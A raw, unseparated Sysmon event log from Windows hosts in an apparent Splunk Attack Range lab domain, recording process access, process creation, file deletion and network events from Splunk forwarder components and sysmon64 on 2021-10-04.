08:01:58.611{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107499Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:58.611{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107498Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:58.611{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107497Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:58.610{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107496Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:58.610{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B4F6-615A-5B02-00000000FC01}7608C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107495Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:58.610{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B4F6-615A-5B02-00000000FC01}7608C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107494Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:58.610{58E9C193-B4F6-615A-5B02-00000000FC01}7608C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000107493Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:58.421{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4E8E797E6770639FB3E8E7F308FC4DA,SHA256=4DFF62BCED844EA260C9C7600F78FC4FC3E7FF09EEC6F5457F903C6C0C4DDD70,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107492Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:57.251{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51911-false10.0.1.12-8089- 10341000x8000000000000000107513Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:59.520{58E9C193-B4F7-615A-5C02-00000000FC01}52767196C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000107512Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:59.432{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33CA95DCFA34BFFCE5FC08BE2436470E,SHA256=BB20F92D29CFE48374C25751233BE33538957CFE7D58E2407A49902DBD5D1ECD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083475Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:59.868{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0E6FD39506FC6E70FBA62D84B312A15F,SHA256=D7DC9E365188D4BF346B08DCD49771DD5DDDCCD4B2F3BB92E89E91F2143B3AFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083474Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:59.868{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=25A3955D5BA488BF906509B56BE7B7C2,SHA256=F0EDF85FE537921D1C76F7DFE2551DAE6062D4DEF42662869E4CB257C3A238E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083473Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:59.493{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02FCE35F1A04E9F68092E1C7B96BF837,SHA256=32A5FCBD64F26C2862C98564390C094E7AB711DF5B25C00A5CAE0AF418373126,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107511Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:59.301{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B4F7-615A-5C02-00000000FC01}5276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107510Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:59.299{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107509Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:59.299{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107508Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:59.299{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107507Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:59.298{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107506Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:59.298{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B4F7-615A-5C02-00000000FC01}5276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107505Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:59.298{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B4F7-615A-5C02-00000000FC01}5276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107504Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:59.298{58E9C193-B4F7-615A-5C02-00000000FC01}5276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000107503Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:59.080{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DFAF2A588CFE81820DE0C8DF50646115,SHA256=06665637ACF5FBDC8AC6510AB80897B9BAC335FF4B23DEB84736D1E7D3E1C2BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107502Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:59.079{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BEB151B043A70517F8F47DDF0793738D,SHA256=A71EC093E5C5EA461942694CF6CDC9F0A04F03BC70EE74FC5D5EF8903A3B83D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107525Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:00.507{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10801F47A89CC96D8CF11D26DEE124F9,SHA256=8A5DCCE08833E92412D97A6D8D48BE411B93B4F2E06D31C45DDCFEEFB62ADD6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083476Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:00.602{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E3B72D1B55DAEBFEDD590774AFBF52D,SHA256=2E0D73C038613D5BFD1916EE12AA2DCCB10E35F2C6A3CC53056CF65948E94EA0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107524Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:00.364{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B4F8-615A-5D02-00000000FC01}5300C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107523Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:00.362{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107522Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:00.362{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107521Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:00.361{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107520Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:00.361{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107519Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:00.361{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B4F8-615A-5D02-00000000FC01}5300C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107518Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:00.361{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B4F8-615A-5D02-00000000FC01}5300C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 